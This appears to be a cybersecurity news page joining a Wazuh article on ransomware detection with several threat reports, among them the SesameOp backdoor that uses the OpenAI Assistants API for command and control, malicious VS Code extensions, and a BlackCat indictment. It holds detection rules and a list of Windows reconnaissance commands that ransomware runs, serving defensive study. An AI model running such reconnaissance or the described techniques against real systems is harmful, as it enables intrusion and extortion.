Tag: Cyber Security

Ransomware is malicious software designed to block access to a computer system or encrypt data until a ransom is paid. This cyberattack is one of the most prevalent and damaging threats in the digital landscape, affecting individuals, businesses, and critical infrastructure worldwide.

A ransomware attack typically begins when the malware infiltrates a system through various vectors such as phishing emails, malicious downloads, or exploiting software vulnerabilities. Once activated, the malware encrypts files using strong cryptographic algorithms, rendering them inaccessible to the legitimate owner. The attackers then demand payment, usually in cryptocurrency like Bitcoin, in exchange for the decryption key.

Modern ransomware variants have evolved beyond simple file encryption. Some employ double extortion tactics, where attackers encrypt data, exfiltrate sensitive information, and threaten to publish it publicly if the ransom is not paid. This puts pressure on victims, particularly organizations handling confidential customer data or proprietary business information.

Ransomware development and propagation

Understanding ransomware creation and distribution is essential for developing effective defense strategies. The ransomware lifecycle involves sophisticated development processes and diverse propagation methods that exploit technical vulnerabilities and human behavior.

Ransomware development

Ransomware is typically developed by cybercriminal organizations or individual threat actors with programming expertise. The creation process involves:

• Malware coding: Developers write malicious code using various programming languages, incorporating encryption algorithms and command-and-control communication protocols.
• Ransomware-as-a-Service (RaaS): Some criminal groups operate subscription-based models that provide ransomware tools to affiliates in exchange for a percentage of ransom payments.
• Customization and testing: Attackers test their malware against security solutions to ensure it can evade detection.

Propagation methods

Ransomware spreads through multiple attack vectors:

• Phishing emails: Malicious attachments or links that appear legitimate trick users into downloading ransomware.
• Exploit kits: Automated tools that scan for and exploit known vulnerabilities in applications and operating systems.
• Remote Desktop Protocol (RDP) attacks: Attackers gain unauthorized access through weak or compromised RDP credentials.
• Malicious websites and downloads: Downloads from compromised or malicious websites install ransomware with or without the user’s knowledge.
• Supply chain attacks: Compromised trusted software or service providers can distribute ransomware to customers.
• Removable media: Infected USB drives and external storage devices can spread ransomware when connected to computer systems.

Wazuh is a free and open source security platform that provides comprehensive capabilities for detecting, preventing, and responding to ransomware threats. It is a unified XDR (Extended Detection and Response) and SIEM (Security Information and Event Management) platform. Wazuh helps organizations build resilience against ransomware attacks through its out-of-the-box capabilities and integration with other security platforms.

Threat detection and prevention

Wazuh employs multiple detection mechanisms to identify ransomware activities. These include:

• Malware detection: Wazuh integrates with threat intelligence feeds and utilizes signature-based and anomaly-based detection methods to identify known ransomware variants.
• Vulnerability detection: This Wazuh capability scans systems for known vulnerabilities that ransomware commonly exploits, enabling proactive patching and reducing the likelihood of successful compromise.
• Log data analysis: This Wazuh capability analyzes security events collected from user endpoints, servers, cloud workloads, and network devices to detect ransomware indicators.
• Security configuration monitoring (SCA): The Wazuh SCA evaluates system configurations against security best practices and compliance frameworks.
• File integrity monitoring (FIM): This Wazuh capability monitors critical files and directories, detecting unauthorized modifications that may indicate ransomware encryption activity.
• Regulatory compliance monitoring: This Wazuh capability helps organizations maintain security standards and regulatory compliance requirements that deter ransomware attacks.

Incident response capabilities

• Active response: The Wazuh Active Response capability automatically executes predefined actions when threats are detected, such as isolating infected systems, blocking malicious processes, or quarantining files.
• Integration with external solutions: Wazuh integrates with other security tools and platforms to improve organizations’ security posture.

Use cases

The following sections show some use cases of Wazuh detection and response to ransomware.

Detecting and responding to DOGE Big Balls ransomware with Wazuh

The DOGE Big Balls ransomware, a modified version of the FOG ransomware, combines technical exploits with psychological manipulation targeting enterprise environments. This malware variant delivers its payload through phishing campaigns or unpatched vulnerabilities. It then performs privilege escalation, reconnaissance, file encryption, and note creation on the victim’s endpoint.

Detection

Wazuh detects the DOGE Big Balls ransomware using threat detection rules and a Wazuh Custom Database (CBD) list to match its specific pattern.

• CBD list containing DOGE Big Balls reconnaissance commands.

net  config Workstation:
systeminfo:
hostname:
net  users:
ipconfig  /all:
route  print:
arp  -A:
netstat  -ano:
netsh firewall show state:
netsh firewall show config:
schtasks  /query /fo LIST /v:
tasklist  /SVC:
net  start:
DRIVERQUERY:

<group name="doge_big_ball,ransomware,">

  <rule id="100020" level="10">
    <if_sid>61613</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)[C-Z]:.*\\.*.exe</field>
    <field name="win.eventdata.targetFilename" type="pcre2">(?i)[C-Z]:.*.\\DbgLog.sys</field>
    <description>A log file $(win.eventdata.targetFilename) was created to log the output of the reconnaissance activities of the DOGE Big Balls ransomware. Suspicious activity detected.</description>
    <mitre>
      <id>T1486</id>
    </mitre>
  </rule>

  <rule id="100021" level="8" timeframe="300" frequency="2">  
    <if_sid>61603</if_sid>  
    <list field="win.eventdata.commandLine" lookup="match_key">etc/lists/doge-big-balls-ransomware</list>  
    <description>The command $(win.eventdata.commandLine) is executed for reconnaissance activities. Suspicious activity detected.</description>  
    <options>no_full_log</options>  
  </rule>

<!-- Ransom note file creation -->
  <rule id="100022" level="15" timeframe="300" frequency="2">
    <if_sid>61613</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)[C-Z]:.*\\.*.exe</field>
    <field name="win.eventdata.targetFilename" type="pcre2">(?i)[C-Z]:.*.\\readme.txt</field>
    <description>DOGE Big Balls ransom note $(win.eventdata.targetFilename) has been created in multiple directories. Possible DOGE Big Balls ransomware detected.</description>
    <mitre>
      <id>T1486</id>
    </mitre>
  </rule>

  
  <rule id="100023" level="15" timeframe="300" frequency="2" ignore="100">
    <if_matched_sid>100020</if_matched_sid>
    <if_sid>100021</if_sid>
    <description>Possible DOGE Big Balls ransomware detected.</description>
    <mitre>
      <id>T1486</id>
    </mitre>
  </rule> 

</group>

These rules flag the execution of known reconnaissance commands and detect when multiple ransom notes appear across directories. These are DOGE Big Balls ransomware IOCs that indicate file encryption and other ransomware activities.

Automated response

Wazuh enables ransomware detection and removal using its File Integrity Monitoring (FIM) capability and integration with YARA. In this use case, Wazuh monitors the Downloads directory in real-time. When a new or modified file appears, it triggers the active response capability to execute a YARA scan. If a file matches known YARA ransomware signatures like DOGE Big Balls, the custom active response script deletes it automatically and logs the action. Custom decoders and rules on the Wazuh server parse those logs to generate alerts showing whether the file was detected and successfully removed.

Detecting Gunra ransomware with Wazuh

The Gunra ransomware is typically used by private cybercriminals to extort money from its victims. It utilizes a double-extortion model that encrypts files and exfiltrates data for publication should its victim fail to pay the ransom. The Gunra ransomware spreads through Windows systems by encrypting files, appending the .ENCRT extension, and leaving ransom notes named R3ADM3.txt. It deletes shadow copies, disables backup and antivirus services to block recovery, and uses Tor networks to hide its operators. These actions make data restoration difficult and help the attackers maintain anonymity during ransom negotiations.

Detection

The following Wazuh rules alert when ransom notes named R3ADM3.txt appear, system components like VSS or amsi.dll are tampered with, or suspicious modules such as urlmon.dll are loaded for network activity. The rules also track attempts to delete shadow copies or disable backup and admin functions, indicating behavior typical of ransomware preparing for file encryption.

<group name="gunra,ransomware,">

  <!--Ransom note file creation-->
  <rule frequency="2" id="100601" ignore="100" level="15" timeframe="100">
    <if_sid>61613</if_sid>
    <field name="win.eventdata.Image" type="pcre2">[^"]+.exe</field>
    <field name="win.eventdata.targetFilename" type="pcre2">[^"]*R3ADM3.txt</field>
    <description>Possible Gunra ransomware activity detected: Multiple ransom notes dropped in $(win.eventdata.targetFilename)</description>
    <mitre>
      <id>T1543.003</id>
      <id>T1486</id> 
    </mitre>
  </rule>

  <!--Antimalware Scan Interface Access Modification-->
  <rule id="100602" level="7">
    <if_sid>61609</if_sid>
    <field name="win.eventdata.Image" type="pcre2">C:\\Windows\\System32\\VSSVC.exe</field>
    <field name="win.eventdata.ImageLoaded" type="pcre2">C:\\Windows\\System32\\amsi.dll</field>
    <description>Possible ransomware activity detected: Suspicious Volume Shadow copy Service (VSS) loaded amsi.dll for tampering and evasion attempt.</description>
    <mitre>
      <id>T1562</id>
      <id>T1562.001</id>
    </mitre>
  </rule>

  <rule id="100603" level="7">
    <if_sid>61609</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(C:\\Windows\\SystemApps\\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\\CHXSmartScreen.exe)</field>
    <field name="win.eventdata.ImageLoaded" type="pcre2">C:\\Windows\\System32\\urlmon.dll</field>
    <description>Possible ransomware activity detected: Urlmon.dll was loaded, indicating network reconnaissance.</description>
    <mitre>
      <id>T1562.001</id>
    </mitre>
  </rule>

  <!--Volume Shadow copy Service (VSS) deletion-->
  <rule id="100604" level="7">
    <if_sid>60103</if_sid>
    <field name="win.eventdata.targetUserName" type="pcre2">Backup Operators</field>
    <field name="win.eventdata.targetSid" type="pcre2">S-1-5-32-551</field>
    <field name="win.eventdata.callerProcessName" type="pcre2">C:\\Windows\\System32\\VSSVC.exe</field>
    <description>Possible Gunra ransomware activity detected: Volume Shadow copy Service (VSS) deletion attempts, gearing up to disable backups.</description>
    <mitre>
      <id>T1562</id>
      <id>T1562.002</id>
    </mitre>
  </rule>

  <rule id="100605" level="7">
    <if_sid>60103</if_sid>
    <field name="win.eventdata.targetUserName" type="pcre2">Administrators</field>
    <field name="win.eventdata.targetSid" type="pcre2">S-1-5-32-544</field>
    <field name="win.eventdata.callerProcessName" type="pcre2">C:\\Windows\\System32\\VSSVC.exe</field>
    <description>Possible Gunra ransomware activity detected: Volume Shadow copy Service (VSS) deletion shadow attempts, gearing to disable local admin accounts</description>
    <mitre>
      <id>T1562</id>
      <id>T1562.002</id>
    </mitre>
  </rule>

</group>

Automated response

Wazuh performs automated responses to Gunra ransomware malicious file activities using its FIM capability and integration with VirusTotal. In this use case, the Wazuh File Integrity Monitoring (FIM) module monitors the Downloads folder in real-time, triggering scans whenever files are added or changed. A custom active response executable, then securely deletes any file that VirusTotal flags as a threat.

Ransomware protection on Windows with Wazuh

Wazuh provides ransomware protection and file recovery on monitored Windows endpoints using its command module and the Windows Volume Shadow Copy Service (VSS). This integration allows administrators to automatically take snapshots of monitored endpoints to recover files to a state before they are encrypted by malware.

The following image shows successful Wazuh Active Response file recovery alerts.

Conclusion

Ransomware attacks pose significant financial, operational, and reputational damage. They require multi-layered defenses that combine early detection with incident response. Organizations that invest in these practices are better equipped to withstand and recover from such attacks.

Wazuh provides capabilities that enable early detection and rapid response to contain ransomware attacks. It offers out-of-the-box capabilities for vulnerability detection, file integrity monitoring, log data analysis, and automated responses to prevent ransomware-caused data loss and downtime.

Nov 04, 2025Ravie LakshmananArtificial Intelligence / Vulnerability

Google’s artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit component used in its Safari web browser that, if successfully exploited, could result in a browser crash or memory corruption.

The list of vulnerabilities is as follows –

• CVE-2025-43429 – A buffer overflow vulnerability that may lead to an unexpected process crash when processing maliciously crafted web content (addressed through improved bounds checking)
• CVE-2025-43430 – An unspecified vulnerability that could result in an unexpected process crash when processing maliciously crafted web content (addressed through improved state management)
• CVE-2025-43431 & CVE-2025-43433 – Two unspecified vulnerabilities that may lead to memory corruption when processing maliciously crafted web content (addressed through improved memory handling)
• CVE-2025-43434 – A use-after-free vulnerability that may lead to an unexpected Safari crash when processing maliciously crafted web content (addressed through improved state management)

Patches for the shortcomings have been released by Apple on Monday as part of iOS 26.1, iPadOS 26.1, macOS Tahoe 26.1, tvOS 26.1, watchOS 26.1, visionOS 26.1, and Safari 26.1. The updates are available for the following devices and operating systems –

• iOS 26.1 and iPadOS 26.1 – iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
• macOS Tahoe 26.1 – Macs running macOS Tahoe
• tvOS 26.1 – Apple TV 4K (2nd generation and later)
• visionOS 26.1 – Apple Vision Pro (all models)
• watchOS 26.1 – Apple Watch Series 6 and later
• Safari 26.1 – Macs running macOS Sonoma and macOS Sequoia

Big Sleep, formerly called Project Naptime, is an AI agent launched by Google last year as part of a collaboration between DeepMind and Google Project Zero to enable automated vulnerability discovery.

Earlier this year, Google said the large language model (LLM)-assisted framework identified a security flaw in SQLite (CVE-2025-6965, CVSS score: 7.2) that it said was at “risk of being exploited” by malicious actors.

While none of the vulnerabilities listed in Monday’s security bulletins have been flagged as exploited in the wild, it’s always a good practice to keep devices updated to the latest version for optimal protection.

Nov 04, 2025Ravie LakshmananRansomware / Cybercrime

Federal prosecutors in the U.S. have accused a trio of allegedly hacking the networks of five U.S. companies with BlackCat (aka ALPHV) ransomware between May and November 2023 and extorting them.

Ryan Clifford Goldberg, Kevin Tyler Martin, and an unnamed co–conspirator (aka “Co-Conspirator 1”) based in Florida, all U.S. nationals, are said to have used the ransomware strain against a medical device company based in Tampa, Florida, a pharmaceutical company based in Maryland, a doctor’s office based in California, an engineering company based in California, and a drone manufacturer based in Virginia.

The Chicago Sun-Times first reported the indictment over the weekend, stating Martin and Co-Conspirator 1 were employed as ransomware threat negotiators for a company named DigitalMint at the time when these incidents took place. Goldberg was an incident response manager for cybersecurity company Sygnia.

All three individuals are no longer working at the respective firms, with both DigitalMint and Sygnia stating they have cooperated with law enforcement on the matter. In July 2025, Bloomberg reported that the U.S. Federal Bureau of Investigation (FBI) was looking into a former employee of DigitalMint for supposedly taking a cut from ransomware payments.

According to the indictment document, Goldberg, Martin, and the co-conspirator have been accused of wilfully engaging in a conspiracy to “enrich” themselves by accessing victims’ networks or computers in an unauthorized manner, stealing their data, installing the BlackCat ransomware on their systems in exchange for a cryptocurrency payment, and dividing the illicit proceeds amongst them –

• Around May 13, 2023, the defendants attacked the medical device firm and demanded an approximate $10,000,000 ransom payment. The company ended up paying virtual currency worth approximately $1,274,000 at the time of payment.
• Around May 2023, the defendants attacked the firm and demanded an unspecified amount as ransom.
• Around July 2023, the defendants attacked the doctor’s office and demanded an approximate $5,000,000 ransom payment.
• Around October 2023, the defendants attacked the engineering company and demanded an approximate $1,000,000 ransom payment.
• Around November 2023, the defendants attacked the drone manufacturer and demanded an approximate $300,000 ransom payment.

It’s said that they did not manage to extort a financial payment from the other victims. While Martin has pleaded not guilty, court records show that Goldberg allegedly confessed to being recruited by the unnamed co-conspirator to “try and ransom some companies” during an interview with the FBI and that he conducted the attacks to get out of debt. The third individual has not been indicted.

Both Goldberg and Martin have been charged with conspiracy to interfere with interstate commerce by extortion, interference with interstate commerce by extortion, and intentional damage to a protected computer. These accusations could incur a maximum penalty up to 50 years in federal prison.

Nov 04, 2025Ravie LakshmananArtificial Intelligence / Malware

Microsoft has disclosed details of a novel backdoor dubbed SesameOp that uses OpenAI Assistants Application Programming Interface (API) for command-and-control (C2) communications.

“Instead of relying on more traditional methods, the threat actor behind this backdoor abuses OpenAI as a C2 channel as a way to stealthily communicate and orchestrate malicious activities within the compromised environment,” the Detection and Response Team (DART) at Microsoft Incident Response said in a technical report published Monday.

“To do this, a component of the backdoor uses the OpenAI Assistants API as a storage or relay mechanism to fetch commands, which the malware then runs.”

The tech giant said it discovered the implant in July 2025 as part of a sophisticated security incident in which unknown threat actors had managed to maintain persistence within the target environment for several months. It did not name the impacted victim.

Further investigation into the intrusion activity has led to the discovery of what it described as a “complex arrangement” of internal web shells, which are designed to execute commands relayed from “persistent, strategically placed” malicious processes. These processes, in turn, leverage Microsoft Visual Studio utilities that were compromised with malicious libraries, an approach referred to as AppDomainManager injection.

SesameOp is a custom backdoor engineered to maintain persistence and allow a threat actor to covertly manage compromised devices, indicating that the attack’s overarching goal was to ensure long-term access for espionage efforts.

OpenAI Assistants API enables developers to integrate artificial intelligence (AI)-powered agents directly into their applications and workflows. The API is scheduled for deprecation by OpenAI in August 2026, with the company replacing it with a new Responses API.

The infection chain, per Microsoft, includes a loader component (“Netapi64.dll”) and a .NET-based backdoor (“OpenAIAgent.Netapi64”) that leverages the OpenAI API as a C2 channel to fetch encrypted commands, which are subsequently decoded and executed locally. The results of the execution are sent back to OpenAI as a message.

“The dynamic link library (DLL) is heavily obfuscated using Eazfuscator.NET and is designed for stealth, persistence, and secure communication using the OpenAI Assistants API,” the company said. “Netapi64.dll is loaded at runtime into the host executable via .NET AppDomainManager injection, as instructed by a crafted .config file accompanying the host executable.”

The message supports three types of values in the description field of the Assistants list retrieved from OpenAI –

• SLEEP, to allow the process thread to sleep for a specified duration
• Payload, to extract the contents of the message from the instructions field and invoke it in a separate thread for execution
• Result, to transmit the processed result to OpenAI as a new message in which the description field is set to “Result” to signal the threat actor that the output of the execution of the payload is available

It’s currently not clear who is behind the malware, but the development signals continued abuse of legitimate tools for malicious purposes to blend in with normal network activity and sidestep detection. Microsoft said it shared its findings with OpenAI, which identified and disabled an API key and associated account believed to have been used by the adversary.

Nov 03, 2025Ravie LakshmananCryptocurrency / Threat Intelligence

Cybersecurity researchers have flagged a new malicious extension in the Open VSX registry that harbors a remote access trojan called SleepyDuck.

According to Secure Annex’s John Tuckner, the extension in question, juan-bianco.solidity-vlang (version 0.0.7), was first published on October 31, 2025, as a completely benign library that was subsequently updated to version 0.0.8 on November 1 to include new malicious capabilities after reaching 14,000 downloads.

“The malware includes sandbox evasion techniques and utilizes an Ethereum contract to update its command and control address in case the original address is taken down,” Tuckner added.

Campaigns distributing rogue extensions targeting Solidity developers have been repeatedly detected across both the Visual Studio Extension Marketplace and Open VSX. In July 2025, Kaspersky disclosed that a Russian developer lost $500,000 in cryptocurrency assets after installing one such extension through Cursor.

In the latest instance detected by the enterprise extension security firm, the malware is triggered when a new code editor window is opened or a .sol file is selected.

Specifically, it’s configured to find the fastest Ethereum Remote Procedure Call (RPC) provider to connect to in order to obtain access to the blockchain, initialize contact with a remote server at “sleepyduck[.]xyz” (hence the name) via the contract address “0xDAfb81732db454DA238e9cFC9A9Fe5fb8e34c465,” and kicks off a polling loop that checks for new commands to be executed on the host every 30 seconds.

It’s also capable of gathering system information, such as hostname, username, MAC address, and timezone, and exfiltrating the details to the server. In the event the domain is seized or taken down, the malware has built-in fallback controls to reach out to a predefined list of Ethereum RPC addresses to extract the contract information that can hold the server details.

What’s more, the extension is equipped to reach a new configuration from the contract address to set a new server, as well as execute an emergency command to all endpoints in the event that something unexpected occurs. The contract was created on October 31, 2025, with the threat actor updating the server details from “localhost:8080” to “sleepyduck[.]xyz” over the course of four transactions.

It’s not clear if the download counts were artificially inflated by the threat actors to boost the relevance of the extension in search results – a tactic often adopted to increase the popularity so as to trick unsuspecting developers into installing a malicious library.

The development comes as the company also disclosed details of another set of five extensions, this time published to the VS Code Extension Marketplace by a user named “developmentinc,” including a Pokémon-themed library that downloads a batch script miner from an external server (“mock1[.]su:443”) as soon as it’s installed or enabled, and runs the miner using “cmd.exe.”

The script file, besides relaunching itself with administrator privileges using PowerShell and configuring Microsoft Defender Antivirus exclusions by adding every drive letter from C: through Z:, downloads a Monero mining executable from “mock1[.]su” and runs it.

The extensions uploaded by the threat actor, now no longer available for download, are listed below –

• developmentinc.cfx-lua-vs
• developmentinc.pokemon
• developmentinc.torizon-vs
• developmentinc.minecraftsnippets
• developmentinc.kombai-vs

Users are advised to exercise caution when it comes to downloading extensions, and make sure that they are from trusted publishers. Microsoft, for its part, announced back in June that it’s instituting periodic marketplace-wide scans to protect users against malware. Every removed extension from the official marketplace can be viewed from the RemovedPackages page on GitHub.

Nov 03, 2025Ravie LakshmananCybercrime / Supply Chain Attack

Bad actors are increasingly training their sights on trucking and logistics companies with an aim to infect them with remote monitoring and management (RMM) software for financial gain and ultimately steal cargo freight.

The threat cluster, believed to be active since at least June 2025 according to Proofpoint, is said to be collaborating with organized crime groups to break into entities in the surface transportation industry with the end goal of plundering physical goods. The most targeted commodities of the cyber-enabled heists are food and beverage products.

“The stolen cargo most likely is sold online or shipped overseas,” researchers Ole Villadsen and Selena Larson said in a report shared with The Hacker News. “In the observed campaigns, threat actors aim to infiltrate companies and use their fraudulent access to bid on real shipments of goods to ultimately steal them.”

The campaigns share similarities with a previous set of attacks disclosed in September 2024 that involved targeting transportation and logistics companies in North America with information stealers and remote access trojans (RATs) such as Lumma Stealer, StealC, or NetSupport RAT. However, there is no evidence to suggest that they are the work of the same threat actor.

In the current intrusion wave detected by Proofpoint, the unknown attackers have leveraged multiple methods, including compromised email accounts to hijack existing conversations, targeting asset-based carriers, freight brokerage firms, and integrated supply chain providers with spear-phishing emails, and posting fraudulent freight listings using hacked accounts on load boards.

“The actor posts fraudulent freight listings using compromised accounts on load boards and then sends emails containing malicious URLs to carriers who inquire about the loads,” it said. “This tactic exploits the trust and urgency inherent in freight negotiations.”

Needless to say, the malicious URLs embedded within the messages lead to booby-trapped MSI installers or executables that deploy legitimate RMM tools like ScreenConnect, SimpleHelp, PDQ Connect, Fleetdeck, N-able, and LogMeIn Resolve. In select instances, several of these programs are used together, with PDQ Connect being used to drop and install ScreenConnect and SimpleHelp.

Once remote access is obtained, the attackers move to conduct system and network reconnaissance, followed by dropping credential harvesting tools such as WebBrowserPassView to capture additional credentials and burrow deeper into the corporate network.

In at least one case, the threat actor is believed to have weaponized the access to delete existing bookings and block dispatcher notifications, and then added their own device to the dispatcher’s phone extension, booked loads under the compromised carrier’s name, and coordinated the transport.

The use of RMM software offers several advantages. First, it obviates the need for threat actors to devise bespoke malware. Second, it also allows them to fly under the radar, owing to the prevalence of such tools in enterprise environments, and are typically not flagged as malicious by security solutions.

“It’s fairly easy for threat actors to create and distribute attacker-owned remote monitoring tools, and because they are often used as legitimate pieces of software, end users might be less suspicious of installing RMMs than other remote access trojans,” Proofpoint noted back in March 2025. “Additionally, such tooling may evade anti-virus or network detection because the installers are often signed, legitimate payloads distributed maliciously.”

Nov 03, 2025The Hacker News

Security Operations Centers (SOC) today are overwhelmed. Analysts handle thousands of alerts every day, spending much time chasing false positives and adjusting detection rules reactively. SOCs often lack the environmental context and relevant threat intelligence needed to quickly verify which alerts are truly malicious. As a result, analysts spend excessive time manually triaging alerts, the majority of which are classified as benign.

Addressing the root cause of these blind spots and alert fatigue isn’t as simple as implementing more accurate tools. Many of these traditional tools are very accurate, but their fatal flaw is a lack of context and a narrow focus – missing the forest for the trees. Meanwhile, sophisticated attackers exploit exposures invisible to traditional reactive tools, often evading detection using widely-available bypass kits.

While all of these tools are effective in their own right, they often fail because of the reality that attackers don’t employ just one attack technique, exploit just one type of exposure or weaponize a single CVE when breaching an environment. Instead, attackers chain together multiple exposures, utilizing known CVEs where helpful, and employing evasion techniques to move laterally across an environment and accomplish their desired goals. Individually, traditional security tools may detect one or more of these exposures or IoCs, but without the context derived from a deeply integrated continuous exposure management program, it can be nearly impossible for security teams to effectively correlate otherwise seemingly disconnected signals.

SecOps Benefits at Every Stage of the Cybersecurity Lifecycle

Exposure management platforms can help transform SOC operations by weaving exposure intelligence directly into existing analyst workflows. Of course, having attack surface visibility and insight into interconnected exposures provides immense value, but that’s just scratching the surface. This really shouldn’t come as much of a surprise, given the significant overlap in the high-level models each team is operating, albeit often in parallel as opposed to working in tandem.

To make the point further, I’ve included a comparison below between a typical SOC workflow and the CTEM lifecycle:

The magic really starts to happen when teams integrate their exposure management platforms with EDRs, SIEMs, and SOAR tools to deliver contextual threat intelligence precisely when and where SOC analysts need it most. This allows teams to automatically correlate discovered exposures with specific MITRE ATT&CK techniques, creating actionable threat intelligence that’s immediately relevant to each organization’s unique attack surface.

For exposures that can’t be immediately remediated, teams can leverage this intelligence to inform detection engineering and threat hunting activities. This creates a continuous feedback loop where exposure intelligence informs detection updates, improves alert triage and investigation, and supports automated response and prioritized remediation.

A Deeper Dive Into SOC Workflows Enriched with Exposure Intelligence

Traditional detection tools generate alerts based on signatures and behavioral patterns, but lack environmental context. Continuous exposure management transforms this by providing real-time context about the systems, configurations, and vulnerabilities involved in each alert.

1. When an detection fires, SOC analysts immediately understand what exposures exist on the affected system, which attack techniques are viable given the current configuration, what the potential blast radius looks like and how this alert fits into known attack paths.
2. Alert triage becomes dramatically more efficient when analysts can instantly assess the true risk potential of each alert. Instead of triaging based on generic severity scores, exposure management provides an environment-specific risk context.
3. During investigation, continuous exposure management provides analysts with detailed attack path analysis showing exactly how an adversary could exploit the current alert as part of a broader campaign. This includes understanding all viable attack paths based on actual network topology, access relationships, and system configurations.
4. It also includes digging into the root cause of a breach, helping analysts determine the most likely breach points and paths an attacker would take.
5. Response activities become more precise when guided by exposure intelligence. Instead of broad containment measures that might disrupt business operations, SOC teams can implement surgical responses that address the specific exposures being exploited.
6. The remediation phase extends beyond immediate incident response to systematic exposure reduction, automatically generating tickets that address not just the immediate incident, but the underlying conditions that made it possible. As remediation activities are completed, the same testing processes used to uncover security gaps can be used to validate that implemented changes actually worked and risk was reduced.

With continuous exposure management integrated into the SecOps workflow, each incident becomes a learning opportunity that strengthens future detection and response capabilities. Understanding which exposures led to successful attacks during red teaming and validation testing helps refine and implement compensating controls and/or tune detection rules to catch similar activity earlier in the attack chain.

The Future of SOC Operations

The future of SOC operations lies not in processing more alerts faster, but in preventing the conditions that generate unnecessary alerts while developing laser-focused capabilities against the threats that matter most. Continuous exposure management provides the environmental awareness that transforms generic security tools into precision instruments.

In an era where threat actors are increasingly sophisticated and persistent, SOCs need every advantage they can get. The ability to proactively shape the battlefield, eliminating exposures, tuning detections, and developing custom capabilities based on environmental reality may be the difference between staying ahead of threats and constantly playing catch-up.

Note: This article was written and contributed by Ryan Blanchard, currently a Director of Product Marketing at XM Cyber. He started his career analyzing IT and professional services markets and GTM strategies, now helping translate complex technology benefits into stories that connect innovation, business, and people.

Nov 03, 2025Ravie LakshmananCybersecurity / Hacking News

Cyberattacks are getting smarter and harder to stop. This week, hackers used sneaky tools, tricked trusted systems, and quickly took advantage of new security problems—some just hours after being found. No system was fully safe.

From spying and fake job scams to strong ransomware and tricky phishing, the attacks came from all sides. Even encrypted backups and secure areas were put to the test.

Keep reading for the full list of the biggest cyber news from this week—clearly explained and easy to follow.

⚡ Threat of the Week

Motex Lanscope Flaw Exploited to Drop Gokcpdoor — A suspected Chinese cyber espionage actor known as Tick has been attributed to a target campaign that has leveraged a recently disclosed critical security flaw in Motex Lanscope Endpoint Manager (CVE-2025-61932, CVSS score: 9.3) to infiltrate target networks and deploy a backdoor called Gokcpdoor. Sophos, which disclosed details of the activity, said it was “limited to sectors aligned with their intelligence objectives.”

• TEE.Fail Side-Channel Attack Extracts Secrets from Intel and AMD DDR5 Secure Enclaves — A low-cost physical side-channel attack has been found to break the confidentiality and security guarantees offered by modern Trusted Execution Environments (TEEs) from Intel and AMD, enabling full extraction of cryptographic keys and subversion of secure attestation mechanisms. The attack, codenamed TEE.fail, exploits deterministic encryption and DDR5 bus interposition to successfully bypass protections in Intel’s SGX and TDX, as well as AMD’s SEV-SNP, by eavesdropping on memory transactions using a homemade logic analyzer setup built for under $1,000. That having said, the attack requires physical access to the target as well as root-level privileges for Kernel driver modification.
• Russian Hackers Target Ukraine With Stealth Tactics — Suspected Russian hackers breached Ukrainian networks this summer using ordinary administrative tools to steal data and remain undetected, researchers have found. According to a report by Broadcom-owned Symantec and Carbon Black, the attackers targeted a large Ukrainian business services company and a local government agency in two separate incidents earlier this year. What makes these attacks notable is that the hackers deployed little custom malware and instead relied heavily on living-off-the-land tactics, i.e., using legitimate software already present in the victims’ networks, to carry out their malicious actions. The targeted organizations were not named, and it remains unclear what information, if any, was stolen.
• N. Korea Targets Web3 Sector with GhostCall and GhostHire — The North Korea-affiliated threat actor BlueNoroff, also known under aliases APT38 and TA444, has resurfaced with two new campaigns dubbed GhostCall and GhostHire, targeting executives, Web3 developers, and blockchain professionals. The campaigns rely on social engineering via platforms like Telegram and LinkedIn to send fake meeting invites and initiate multi-stage malware chains to compromise Windows, Linux, and macOS hosts. GhostCall marks a major leap in operational stealth compared to earlier BlueNoroff operations, with the attackers relying on multiple layers of staging to sidestep detection. The GhostHire operation takes a different approach, targeting Web3 developers through fake job offers and recruitment tests. BlueNoroff is a financially motivated sub-cluster of the Lazarus Group, North Korea’s state-sponsored cyber unit linked to the Reconnaissance General Bureau (RGB), and is believed to operate the long-running SnatchCrypto campaign. GhostCall and GhostHire are assessed to be the latest extensions of this campaign. The threat actor’s strategy is said to have evolved beyond cryptocurrency and browser credential theft to comprehensive data acquisition across a range of assets. “This harvested data is exploited not only against the initial target but also to facilitate subsequent attacks, enabling the actor to execute supply chain attacks and leverage established trust relationships to impact a broader range of users,” Kaspersky said.
• New Android Banking Malware Herodotus Mimics Human Behavior — Researchers have discovered a new Android banking malware called Herodotus that evades detection by mimicking human behavior when remotely controlling infected devices. The malware is advertised by a little-known hacker who goes by the name K1R0. Herodotus works like many modern Android banking trojans. Operators distribute it through SMS messages that trick users into downloading a malicious app. Once installed, the malware waits for a targeted application to be opened and then overlays a fake screen that mimics the real banking or payment interface to steal credentials. It also intercepts incoming SMS messages to capture one-time passcodes and exploits Android’s accessibility features to read what’s displayed on the device screen. What makes Herodotus unusual, ThreatFabric said, is that it tries to “humanize” the actions attackers undertake during remote control. Instead of pasting stolen details into form fields all at once — a behavior that can easily be flagged as automated — the malware types each character separately with random pauses of about 0.3 to 3 seconds between keystrokes, imitating how a real person would type.
• Qilin Ransomware Uses Linux Encryptors in Windows Attacks — The Qilin ransomware actors have been observed leveraging the Windows Subsystem for Linux (WSL) to launch Linux encryptors in Windows in an attempt to evade detection. Qilin, which emerged in mid-2022, has attacked more than 700 victims across 62 countries this year. The sustained rate of victims claimed on its data leak site underscores Qilin’s position as one of the most active and pernicious ransomware operations worldwide. In new attacks spotted by Trend Micro, Qilin affiliates have been seen using WinSCP to transfer the Linux ELF encryptor to compromised devices, which is then launched through the Splashtop remote management software. This is accomplished by enabling or installing WSL on the host, allowing them to natively run Linux binaries on Windows without the need for a virtual machine.

‎️‍🔥 Trending CVEs

Hackers move fast. They often exploit new vulnerabilities within hours, turning a single missed patch into a major breach. One unpatched CVE can be all it takes for a full compromise. Below are this week’s most critical vulnerabilities gaining attention across the industry. Review them, prioritize your fixes, and close the gap before attackers take advantage.

